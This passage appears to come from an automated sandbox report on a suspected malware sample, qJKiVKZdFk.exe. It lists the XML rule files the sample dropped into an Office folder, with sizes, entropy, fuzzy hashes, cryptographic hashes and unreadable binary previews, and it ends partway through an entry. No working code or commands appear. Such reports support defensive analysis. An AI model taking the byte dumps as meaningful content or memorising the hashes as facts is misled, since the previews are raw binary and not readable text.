                                                                                                                                      Preview:<?xmlf.B...#g......K'.......X.j....Q2.37.!.-.8......_3.*:.)..ey>].A{.nV....B...`d....}|[...7..<. ..e.......M.'.M.-.F&.=l._.9..Z.[G.S.bq....:j...Wx...ANT.;c...8..5.N_..PBm..G..^.Y..%...{pfe.&d.h.^@....:jsN..'6..9f,B.;D...<...c...y>}.l..%.Z.'..S.D...iz)....D~X..q........! .I../(}.m...q/.j.#}..r..Ye.].O*. ..?...]..p.<L3.2|...).}...8.:...........Y..)........$.....7.fw..`.#s.j..B......./.E.......A.{...<..Z. e.[*.Yt..}.w.|d...Y."..>j..9..,n(h7...3}.8.3...s..A.A..d..-SH..;...'..:..C.!.~.=-...8..@.7..oW.3'......s/N....H.p...P.S.n.y.p...R,o...p..D..4.mJq.@i...d.l......Aw?1.a.2..Q}.f..._>].....g..7....=...Pt.r.. .+.....bAE....s.%<...P.'...(.TK..RU.E..e..=.*..U.....4...y.:.nkL..^.E..ga...>....W#..*...b&!....7..0......7Y'..!.!.":^7H..ck_..a.;0......P.a..FU...!..... o,.Jge..+...M....Z.JHy..,...|V..&.Y.F.;....}...g. E..<.M..;...L.a.......zx.c.C.?../w.oZ?..%...$...f..V..7..s1..V.#.....*....5;.1U..-|..R..v............O..r...l.g.i..+..x.0U..b*.M.y]......3.(

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11514v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7119
                                                                                                                                      Entropy (8bit):7.972226205688474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:V1L83GhMIZ+UGQkTAMTZopIR/PoY9yKOb9:7QSMLUJkTAMTuqJr9yKC9
                                                                                                                                      MD5:98535E7DD50610067C52E34D5A01E530
                                                                                                                                      SHA1:3CF6B86C889A9C588DC2F9708A68EFE0A98032CC
                                                                                                                                      SHA-256:F6332F7F57D61F21AB83CAF436319CCE4D17638B69E445B51A57240DD47D0565
                                                                                                                                      SHA-512:3BD17BD64BE348DF82D86CBBCA7429E054BB09C8F0EE3729B8A3B68037FDE08D0F3765D8C3F158A820FBFA60B911DACCD979D89A2FF6EAF276580FE457BD5C2B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.{uoQ}.A..N.7.o..~.>.n.....3b...........w?.3ad(}.....w.r.6V..b-S...J%.....E..j.......S.......%!..i..D=....C.W.X....,.P]..Aq.......u%Yz^.<w..g.]*.t.p.h..."&Y}.........Z.tI.y(..6..XTZ...j:..._.......`.T.'...>.[.dDc.e7.*./.B.....@.m.....X..pN...c..kw...y..x....,.n..X..a..Q..6m|q...'1U-.`.'X...(....1s.x...v.#=0{.F....n..J....m....."|....WZi}...P.6Z...:......p.....{G..Wu..$.j)....=....'../d.&...#.).A.......P.JGj\b..|....s%.2_..*....4>M]AB..j.\.i......P........^{.!...._.Z......D.zA....C.B......q...,\...|.!2...T.G.5.......P6..C.x.#...].A..:.....uV.n..J.J...2t..v....l....o=Q...6.[.~3....y.:E~.*...U.....||m)....3.`..d./K5...s}.y.KN_.b3..v2..k...*p.i......v...i!..........{.FR.I.a..1/..r|m.......$A.m.....9.[.S.W{.`8:.c0S.EV......M.K.z.,.....F.~..l..2.".....?.ml]9..J.Z.<Y.....Z....:_Q...?W8...&...N..j.Z.;..2.s;k...8.F..<..zX7.g.`...D,1bj.......`..D_..x..#..yfk.:.z......5.-L..R...yZ.....{r......Q.Awk.... 15T...,.^.T;.!.d8...m..M8)...a..:E_..K.q...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11659v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):762
                                                                                                                                      Entropy (8bit):7.694956247901904
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Q6fcxcO9QIhxhpbNMaHUPX6ZTzlO++Sm8q+Elylwtb/3rHLz/GeIwP4BAmNzJSce:Qz6OHhpbNMa0PXkUamJPCAb/3LOq4LzW
                                                                                                                                      MD5:7439ABD58E6C4DD8FCA3260B363CA125
                                                                                                                                      SHA1:50759AF127D0AEC89D9B6FF26D5B6D631131E7A2
                                                                                                                                      SHA-256:C1B367B9049BCC104DDD0C8EE7185974BD91CD52CABBA65105B8D2B6E6629718
                                                                                                                                      SHA-512:532388DD2A2469746FD249B7C8E23AB8A3ADBC2E63666493278E9CF12AAA223874D3411F92340E62461630CFE7B62E1DC63AFC9A342FD0E232EEA9660ABB02FF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlm.-q.[..!H.3..bVY...>.....3.&..>+Q.]{F....u..U...A.N0k.2..m...L........Fi.G;..y..1...b...P{Z...>.h..Z.L.;D..\X..+&v}.....i=yF...-.Sm.%.N..*......h'O.vC.rD......y....qK%.Y...p.jL.F..$......59....K(.......O...RB.....>.0...q4.a)|..G;..(.JqX.R....a|.j..<hL._..fWol..B.2......n.l?.@.P...o..:M...aD.|W....<sg.......b..j.a....".@.8......q...p.c._..r..Y.*........o....R$P$,)!.....@T.[..r..A.. ..(.......Z!.(.....j9.....}a.9.&1s...2...-..S@.1|..B..j....@E.Ic.%v$.>.7......;'BJ.t._..d.....K6...$:....w.N..v3.b...NQ.p.s..Pk.0.?.....j....J?...Xh...?I8..o'.[HG.&`...V.(.$.t?.`.i&.S<Nv.<.........A.J=...{I..7....sQ.V.i.;jqu.....%U.$1.?......}..K..Q...c...s^.c.A.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11701v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1463
                                                                                                                                      Entropy (8bit):7.854647751825908
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:cTDKfUZTLj4Hbg5X4P9oQVT8UTYUy6RgkUjXHt3lhFkbIjuUB7ZNEIf/BMbD:cTD+M4So11TVglj3JlhkIjNNlfZGD
                                                                                                                                      MD5:CED20EB51E1FF5707577C4231643E314
                                                                                                                                      SHA1:EB8D44A35761450D747DCF1504BF79708BAF0818
                                                                                                                                      SHA-256:971F0C14286C0BA81411F9634CB0DB2E3422AAEB25A22C20A39EDC152EB84FFF
                                                                                                                                      SHA-512:529BA33E99D35CD9425A679D341BC100805290E668B2DF3C443437173DFECE2CBCE8D41D039BA0A094EC6C6ACF2CEE0315A7C9EBDA0A54D0ED2F2D6B6F810302
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..N$...=.Ntl.9rH....u.s...i....~..>.m...%=...<.g.@+L..}Kh|....FBd.9..<.~......xUb@<.oW.~a..$...6......\..O....]W.C....;.....Ovc..} .&_.....|.*.L....93.b.B....g.km..E.......B.....b.%$.8.&.5..;y....&`]..._....L,.6]$d..6.....pwz`....K:..gy [s....]...{(.\.h.7..X...,.....d../.......'y9\G. |@R..7...;z5...+..B..gR.....pb....zq_../.s..}.<a.@q:\.".h......f.....9oq.V>.sl!."..<.......:..,..=....p....z/.VC...a].NJ...C.S......X1..z.MhgI.z.>............u...@.t..ay.oK..!..;..Z.....r......'z..7...Gu.|..{..<.%..f.%f.- ..,Q..1.O..+L1....,......:..|.....].2.?.e.Q.B.4.2.l..{ tj..........t....J..4.1Z\<...4..9)w=....f.Yq<.^.UG...9..k.......u....G.\..$....u...."...3..q..'.0-....L|Z.....V.Y.......*.`..X..!.|..1_...:"........KW...!m>o...N:..._p..C..^_..c.I%......K.8..+V`..}...`...{....F.KS...&..7.....tN..`I.UC...P.^Utm..H.o..V.%.9QL.S.U......?.z...k.$....p.nl..][$Y.......!.UA.N.$.6 h.~;[E..E......Zu.l....Z*l..8.x..c3.${.q.\.F5R&1..KQ.....y.xP..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11705v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3505
                                                                                                                                      Entropy (8bit):7.938516427582366
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:EBuNLpOEo2GFD/vE8KiuxlhOX23DFGmUkd1p7qe:9jyFD/vE8nMOMDFGmTd1p71
                                                                                                                                      MD5:DC1F38561BD96921F4E76D579774AA0D
                                                                                                                                      SHA1:9A1220826EF3A81811482F571371834C5ABCB2C9
                                                                                                                                      SHA-256:AEA7D3EF832170CEC096BF56FC7020492EB9D91AC6C128167E0FAB3F871B3279
                                                                                                                                      SHA-512:0346C9B4784459AC26D41321BBC2A7B3247D1C908842EA6662C5F23B05D6F6AC8E98DF08367BCD4BF4F6B4B1DEA052CA2105C02765FCD3F470670EF59734CEBC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml~Gew.f..4P.t....s.....6)E.?.C[..k..T.m..c8.vzU.....)j..4......0q....\.....7q.4..%.R;....^....I.g.....&[k.b....aY..6..+H.j../h..9_.n..+...j...WeW.1.. ..E...w...dh.OGbB.?D..2.vRhS'..D1S>7._3..I..q.........L.d.u...q.).~5.'Z.;..P&.'.S]..6...Z..V..{..p..r!.F..k..G.s...(..(...5.o7y......!.....qu.9vKg..3..z.IO.ct(.J.1..^...sN.6.^_..$..........p..;..{E@]E.'..].....].G`.y.U.......+......R.l..i.m..D...:..n.n.SjWs.Am^h9.`..I.^.(..G.l....B.5..H..#{..+V.3..w...TN....:.k.^.K..#...s.y..B....y....xD@*.GF..d..d..#...SH..~M.n.x.....F.R.R..._.......s.F...4..VA.$..o.-.0.R. >:'...B..E..krV...`..o..G?vO.~....j........*a.....Ak...J..t..B......../..dP....r.5..!^..v/..q~h.....)N..{(.V".....2@.-2.c.GX.....^/.9..4M.:....9.......QX........o....yj.y.....l.Nj.f*].pU.-..wv..o...F.7.W5..+..z...S?.............0.|?.....Rl....^.1.8....,.FfD..._...d.f....U.j..ZG@.QWi...a..+.9 ?.3Ol..p.)....yK.FS....)$.f..~.J...K...m.:...g..4r.......@m..xt.t..".GQ....2TR&..~*..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11710v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):965
                                                                                                                                      Entropy (8bit):7.761683927058467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:EYzvhYQrxQut1kRZiQje45DOVyV9MCGHAlBC9p7bD:1jhYwbt1ciae4ZOqiCioCXD
                                                                                                                                      MD5:41A0A4D4F56C5B99474FC1456C87D096
                                                                                                                                      SHA1:B960BEE8068E31D713878C07075773794A2D8B9F
                                                                                                                                      SHA-256:01D287EF56EA6423A0C2259E12BF08E16E4F02D81FFDF8451A77F8BB3153C141
                                                                                                                                      SHA-512:97CCAD9B5B2D7AB8770F18831857B8475C0BD63400332D5466AB09E308B55FC22481755BB5972E83DD37DA8CDC73DFE1F300F327BA5F75BAB2E7CC4AAA9B0EF4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlI............JAZ....we..&0.r..."h.a.+H|..g.u\.i..2;.@.Xd..B.{....]...$...tn1.....g.PRA.s..jm"-..f6^.F.Et/.5....}jo..G.z.Kd[..B.u.n../_Mh....v...........*.mF..Z.H...I.6....Ho..5<..v,,.I.+..c.U..wDz.(u.Z..i.0......5+.3.?..E$..'...tl9X..T....4..4./q..1.Q.)O6.i..sf&J..kU.p.0I.'...b2ta....S....-./>....%...E,..T.....+b...%.[...6>.[..k...H....ny.3.=.c......#\......Y+.k..L!..u........l..h.Y.9.....>..Wic...I/.{3.....vT.).y......c|..r....%X.u..e..@..W<.......t....' Y..J............"+...ynk...]..y.>...'...FMZM...j...........!.....'..D.!.UB.qP[...p...c.?1 ....o.s3......#..[\.X..l.i.1.....K...}..=1.+.Armf.3..u.d.g.....g.......$4...M..u.O.A...?.l....<d..Ge.N.K..bX4..1..X.mdpd........Li.Hb.d.iZr..7......AIj.....J....c..=...T..(..uo.*N..u...B. ..g.e......P.........c.[...2..I.Y.....x..!o.QA=..B....0F.a.....|o......}.."6..:.t...t2=. ....=.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11767v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2983
                                                                                                                                      Entropy (8bit):7.926651357656473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2M6nNUElagNwrSvYWXwkNljoGrv+PCXkbPMtaVoVeJS/ggX6c2LAQin0E22EHXVN:J0NUANqSg8ljokSFbUta/JS4gKccAMJ7
                                                                                                                                      MD5:F7213DAB65A0F0A356C7F96A8E2C50AA
                                                                                                                                      SHA1:66E38E4968940D68D143D9BC837B7D00624E5B31
                                                                                                                                      SHA-256:99D95576EE9B2FA6DCF57F6C895833652DFD53C13C9E794E0888BA333546685C
                                                                                                                                      SHA-512:CEEC7465095B406EA94CA41D42E9766745BCB5F609E344E04B3DF2671CC999DCC7E93EA2F5A934EB80E13753F94DC0290551208209473DCEE7AA2F75F2D18EBE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..YH....a..)....Mp...y/>]V-.h,..Hd.`...ej}tX.S.u...'..r.j.p...|.R..i../v.KcH]....5.<..^w....t.......Z.........W+/.8..H......K.G...D7.7VK/.J....K..<.K..\..R.S.....0A..3..A.|.......j...v88.6NQ...6}W.|k.r...;).r.'.l...GD....'.ntu..Z.g..FIG5"........v....(.......m.....NA..S*Eh.|_.l..+.#.u-...b..;...*...h.5.....N......3H....L.i..g..D..f......7C..i.P...\.E%U ..1..u..<...}.Gek..'R..,~.".f.<.....Y..O..}-.2z"t4.=..Ip..o.?.I.ox.........o..._N.6;jOJ....yGw.=...C...t..~...U.?...[.e.s..Yt.b..)c.P.(>.:..{.cj..P].s.W....5...Z.=`i.h).2..@.[.v.t._.N.Y2......o4.i...@..&^....S...r.../..Ua2....S....O2..p..{.....F...p...._]l%R./ .G..zp......1 f..W...K.A.0.h1..... %.....7..K..O.mi... ....^D.I..{.i.X..F..J..p.....^.....x<.UabE.iG.LI..>..F.....l..<.....$.`.q....Zly........@.V..lRR.....k..8a. .dF..3....w....k......X?c........Ke...;v..W>../....{..z8........D.E;@KK)..e....7.@........7..ED..z..C1.].?.9.{Sq.Jh'..W.Q..jx...NiW...s....Ekq?.H....z...%..[

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11768v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2487
                                                                                                                                      Entropy (8bit):7.924901217252964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:uSGLyl0n3enTZFffB8ZViat1fzDatYe+yCbsp98tMDNehAI2hvE43D:u7L4V8Zwats2ieMRxI2i4z
                                                                                                                                      MD5:850D9F56024696FA2CDAAE88ED314D81
                                                                                                                                      SHA1:CCB962E947FAA927A602FAB553EB7F8DC06F87EF
                                                                                                                                      SHA-256:06B90925292B6AF86EFBDA1E17729411C4EC5152F415D8DB514BA78B771E18F3
                                                                                                                                      SHA-512:518123356626AF3879EAB8DCB68080798E0EA9D0D4BA5A70C71DFF1789F2D17FCE8BC8FF62FE7A4DED56DEF5DEF6E5E30375B88A385DBA71A0362C482A1CD10E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml9bO.....i.kF..}...i`.H2.....U..r.7.....+6c..n..%E..u..Z...#...g...q....C...U.cE.2_.H@.nT.Z...4.+.V..y`..V.....c?.o..cd.c.G...j.|..`.K..-.@.m.N....C...'.m...} y.E3...{.E...*..62.{..f^{......I.mFFj...B....g!.....u$K..<.S.A....}:L.........+..2;..~.L.:.......L.[..x.i...c...n.[5D.....J.......W!='......2...<yC......Jb4..#...mkC..j,..a....U.1.2..86..i..B.$G...f....T..@*..%...s.^.....Y..V.!....GC......)q.[.+.G....)..>...nF[.h]..../..f..|G22.i...`.Zz...`..Bp.Q.....O........=........<T.gL&....2.x.g.h{....{.._E.............a.......* B.8.:.HR..z.ke....Q..j7.....S.7Y,.\]?.8N.#q$..{....gCy...Ix.T...v.1.>(.....R|..T...=..X...P....{E'.,..~......=U.b......j/.~.T...4X...............<..`.&:.'Z....W7.9.H......<......~k....3....>.9......).&..TZ....]^.i_C..+.)w..)...r.?..>..7...Z#...Q.K..|.!.7.y..7..c...8.......O..?.d........D&.&.d.....r<.D.5.^[...4E......^.W.....9........../{...../......7U..X^.I..o...={...}...{..gBd..........Ub.*'..CS

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11769v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3132
                                                                                                                                      Entropy (8bit):7.951306719452072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QFjTrQFTCQH5z8wvHQK7Y0ShDsbsVUHqOTdCyeRl4ADvNvGFJ8Lw6cu4Pw49EAPD:QRTrQF6J0q0sVqqwD+l4ADk8/4eAb
                                                                                                                                      MD5:B192226539F722A7DDE7E3AA85157996
                                                                                                                                      SHA1:249313A0A937D73C5B0675D2612538C448E4F198
                                                                                                                                      SHA-256:BE63CB21258E455AE37C862A0CF37511F95F2DF9E8AF1FDBB00DA16D9521E0E1
                                                                                                                                      SHA-512:6817652199B39780C0E2FF88D809BE68C70C4816BF4E9146FD81B125368515064FCBDD519790B04B576C4F20FF18F6E443E9BE47E9A5930A75AF36D935617C17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlme!.w!.q...Z.............M......@.~.Z.....c3.._....m.kH...>..l.J....p...?...Y%L..C...eLO.Og....._.."..T....w......u~......q.;^.z....M2.x..W...Z...\....#..TjP.CM....J.qLnS1...?L..Y.E..KA... B.%.Oj..i...L..H.....!...@ ..]T.^.A.V....O48...rE*o.^.L8\{{P............@...|P.%;^...3...9.H..}...d.....H...Pk.]...W..yyR\.l....W..;..Y...... ..(..?.u".i..hpNr...P..../...r.(....1.W.R.`..,...q.......2.E*.......\......?M...3...Ag..Lj..s]z.[...1}..6......}.....C R..E..4...1...'.Z.D.......af.p........C{...#.`..?.....9...-.=..y.a..?.S.\....w...Y.........[...t*.X,A....}..`.|.......b...lkfq..c.F_....oGk...6...}....M..IyH............!.Y....r7...#...B......p...|......8J4)V....D%.!Ji1.R.....T.w..q......w.....fi.....`.mmG;8,u.*?..<..8.G.R%...'s,..T.....=..{.uW ./.-.5"]D..F.s...5|.2S.<.3c.Cq....{+:-Q...X}`...X@8i.Ym..B.F/[....].~.egJ-7\..R.z;(.%.........Jm.Yg.....)IQ..I..,....gV...DS....Z9.....-..@.s..5...=<.....vm.T...F8.1....y.....!...C...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11770v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4968
                                                                                                                                      Entropy (8bit):7.9618672934317125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:jS5c1jpjCb4Ad5UHdC+okChk4x63YGQ4eTjmkgdqx7hkd69MKVLSFp7U:u5c1jobK9+lk4x6IB4gp7hkd6uY8pw
                                                                                                                                      MD5:09176E8D59FD966048B4E63947FF8C32
                                                                                                                                      SHA1:965C3E53A651482F537A3C827771FF6233F6E125
                                                                                                                                      SHA-256:941E579241A5014C4E43203E319DAB1C8405B255C7CA87408ECA2ABF1AA303BA
                                                                                                                                      SHA-512:0D70DC6AACEBB3337CE4991ED3239F6DD92F7AA7A14B6BDDCF63968364D04A7B7022881ED441FC01A04D1A2681097265E06ED81DF707B09A227EC128C98D9E5C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.G...E.j...o...,f..,....\I.D ..\z@0.,...q........12...W..T..i.s.).am...Z....U...2.v..j..p.....jZ..?.0.c...8.e. .9h#"..K......}.&..}F.K'.^...2..xC...q<..1s.3.............yW.......we:.....Y.Y%@A..i[....'.j8.....5..cs.9.)....M.%.bq...u....;.,..4..A.Uo.0(..|. zY(...W...)..!..."...M......D.*....dr2.......R..[.M..e].Wy..!..V.1Q7.....n.....zz..1......a.H...B.rx.R.y.m..UD....../....<uc..X-Y.N...xa.s...}c1..C{.Xc..].H..H..D\..>DY.6.....&Q....l..1${Q...7Q.K.ov.T]P6.].Z....4.............B....e.$.t:!....,GIP....0=X`..x.....U.jj.f....~......Y...m.H.....h./dmG..d..w.C0...J*w...."....R..Sj.f.!dx.1}bOt..]..n.....lX...Vuaeu]PH_?......ah....y./...'_....X!./)I...`...vV...;..C#...T...w..x.N........jx.wk.!.=.n........fQ.>.... ..&.....]Y...v{^.....a.lY.AKk.p.r....Z./.......CE...i"J_..2.5..!....$.......7gJ7..c....!....li{.~..0.J3.x.RN. .sc.7c....F...T.."6...ir.t.W_-.U....v.w.dO......Y...5-.#..nP$*..'..d.y.....].U+.j..r~..=.........E..<M.Dl..j........o.s..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11771v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7596
                                                                                                                                      Entropy (8bit):7.973687860214366
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:fRTZoIjuiN1OwUF+OGuPYj7t+BNsOC7Rqcl2FNkTyRQd:ZNoYxUTGXjp+Z+qclgSKQd
                                                                                                                                      MD5:0494D5ADC80BD5D0AFA7AF8EDA410564
                                                                                                                                      SHA1:2DC54431FBBC9103426ECB92B3FAF6B04BED7211
                                                                                                                                      SHA-256:7AA42F3BDD4E8A7629EF7ADAF4FD95BFBF3F8C2017EE1C77F2F0C91DEFC048C0
                                                                                                                                      SHA-512:C647CCC152CE81DC104CF2725090391BD9893E23F8989576D420A718D76544CD49A2AB97FFB2B3FF3674A95E3C9D49BF7841D79A261E323452EB26B298CCD66B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...d....e..W.p...O.."Y....{7.{..k...u}.2..~.yj...B.NP...b| '....8.d......V.D.(a..rk...K..4>=..C.C.T.Z.....S....8.........Mi....|...8Im.+./..t>........0.=`..#..V.l..e.K.g,._4.Xbv.NI..F..{.m=b.....[0).K..'....g.8....K.].n?..V...{..w..........u...m?A.....ELu.AY.DA/.....qJ.9./D...>;2p.@&.;....4.`.feh=.j.L&..rC.Y7..B.[oXA..K..!.+.....bN.n!....&e.P.d{..#|.....0y.....\Z....0h}..1......L.....oF.g....%g.-..4oy.).o..f...8..'}....5y..$8. +.........`.....f...19. Z.....P.. ...m..zk/..N....2..^lO.`.nu1...#..mL.&.z.k.....e;..*.eA._...I.....RSN53...@I.....h....4....B..D.W..AR..1...*.K.F..&.@...`v.....S....\#<.sj..6.{..d....\...b...1.-...v..UUQt.....?<n.wk.=~..X.yz.&XM........3.G..DmD.\.-5.a...L^...@..Cjqh...|....C...cK..-.:.-VP....W......("..90...P.dS.K......u.-...FEF..ek.X...;..9u ee...!...3.J..;.@.z&....%p:.f$.x1.."...<q..3.hR...H.{|\.S...^.db&......N.8..GL.N.Gy...P{mRT.#...2..Y.....5K2].T....<.%#...S.(*S.......ug.4..@..i..[.303=.v.]z.R....%..T..P3f.9..|

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11792v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7356
                                                                                                                                      Entropy (8bit):7.977636079502399
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RvR6L1qBMYqto/HA8se5b37SCp1kzlppsRrZeGTUTqot:RvoLsTb/g8t5b39kzlp6FnYz
                                                                                                                                      MD5:6FC5B86C9D4AE78E1A30B9BE1218F85B
                                                                                                                                      SHA1:DA38B8D95B542772370956A87BAB31E4FC146FC6
                                                                                                                                      SHA-256:5AC7EDE2701B3B5005B38D15407DB2E97908AB3708E528486FD8EBB93DEF6196
                                                                                                                                      SHA-512:6DFB2A20C1D3A21C67EF167426A804C34CD4EAD5E0B7E3666ACE893447BA0E6E634292AEA268EB3D0BA913E31F23E349DFF6D9046D82B450DDA7368229CE949B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...........F.}]...E./[.P....oG;......K..j.xj.K_..\.F..8x..8.e.7._4..........qf...NFrn....s.).....il...>.9...K......!.^......_.q..D.M].VI...#..).a./..+w..-uLC.x)8.@0.O.8...;D..vu..6.m..-%..P@.!.s^....]..&..\..._$. ,dZ..S g^BqkO..i1...&.."..d..L...k_H...b.s.........02zi...^....f....s....F..m...c.[..2...Mx.3.5.'....Z..d.gy....vC......5. .....u..2+Z...l..<2..MGx.&..+..8.T.-...."Ps.w.j....+............J...d!t.q..........t...o..3....@...T.1.....6....d.....b....u..T.~.?N..U..9=....K.....XDcP*.&.'X....n.~.NN..L.Q...II..H.......q..X.C.....g..1c...M.VG?.^%..C.1,.v>...I....j..*Q.*X5...X.)[tt..y.{,.......)...).\..D.7.M...if.....H.F..3...:K..)i9G.....u5~A...1....W..}]...?.......}Y....V..6NTs[.;..b..[..>........S..m.ya).0..Y.TTiL....E.. f....X..ak.D...ng..n.I..<...H.nek.....F.....Y.(R.hh=a.a...`...a....#=%b*...gTj..g...........7`#....}...e.%*Ro!..pA/..\i... .p.......l...:#P......*....}..hW.=....88..~T*.?.,Xvk...H.;9...hy.`.NA..-2...W....]...U.4.X..[W.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11793v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1551
                                                                                                                                      Entropy (8bit):7.8686338140707415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:HUDGLjuwAEPTJlNb8BjH7s+p5gmkImt2BYYD:HkGWwAYFizA+hXmcB
                                                                                                                                      MD5:4D6C009621AE778462BFC53E12168805
                                                                                                                                      SHA1:6F04D87BE87F04EF279C931B78FF8978DC9A57A0
                                                                                                                                      SHA-256:110B96DF6A5E65867795A9FF020775723B4826069D310A9997A2CDB0EE9CB0F1
                                                                                                                                      SHA-512:AC188E294DB9CC0167C4DC87A2C6E1A00591FF8410234BD565FBC209BB88763E0EFB8ABED5C868C130F2FB504A882AB2504F9E54C76565595E2725AF6B5A559B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml!.%.....A.........8.8..../.u..Q.Xs#..b$..n..LYT.]...!$.Lm.....M..5)2m.f.....;.Q.Z]2Q.Fe.. ..*.'.=...@.*..1...H.y.:n..c.$Q)Di`Uxj..J.w.B...H:....q...r..+.....W..). 9.w..#.fH8l.]j.h.J..w'..yT.+\Mu......._`.T....DJ..f.hT......^E.......H. $..^.!-H..\....l.Y..`1.hm..Y....JU'g..4.....r..@.......gn.../{[olB..U..\.P=.o..L..;9...N.z._g...Fv&...7.{.SZs.,......*...P..'.V.....tj........R.JN.*..U.&.BV...7....m'}.%..s.A...~.D.0v).8.f.......!5....NdwX.%?m.N...P..~."......u..m..f.Q..%e.......Q..`...$..I?.....{.NT..2...m..R..\/....z.k}#G....6...'.Y\......4.%U.2.i|....O..o.'I`. w$N.......v.....)..y..3..g.,....Tj.Y-E.wY.R.[.....<q...*k&..r`....u...n...z..n.c..;>....(>.^..G... .1.UJ....g.U(%^..M-I.....-...%.6V....Z...B..H..S.m`....0..k....d. ._.....|q^*..\....4.3..k.`8.....s.....fB..A..../...}i....B..X.dx>GX$._..K.HH..5.=<....#.H.O.$. :y..Lh.Yx.5.O.f.Hx..)-v..i..$m...)C.=.2.......t........OWY.h.Qa.w..H.%.P.|.R....`.....$.....P.;7.m.A..E.~,.w....E..{oy..s..L.*-Q`.@

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11794v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
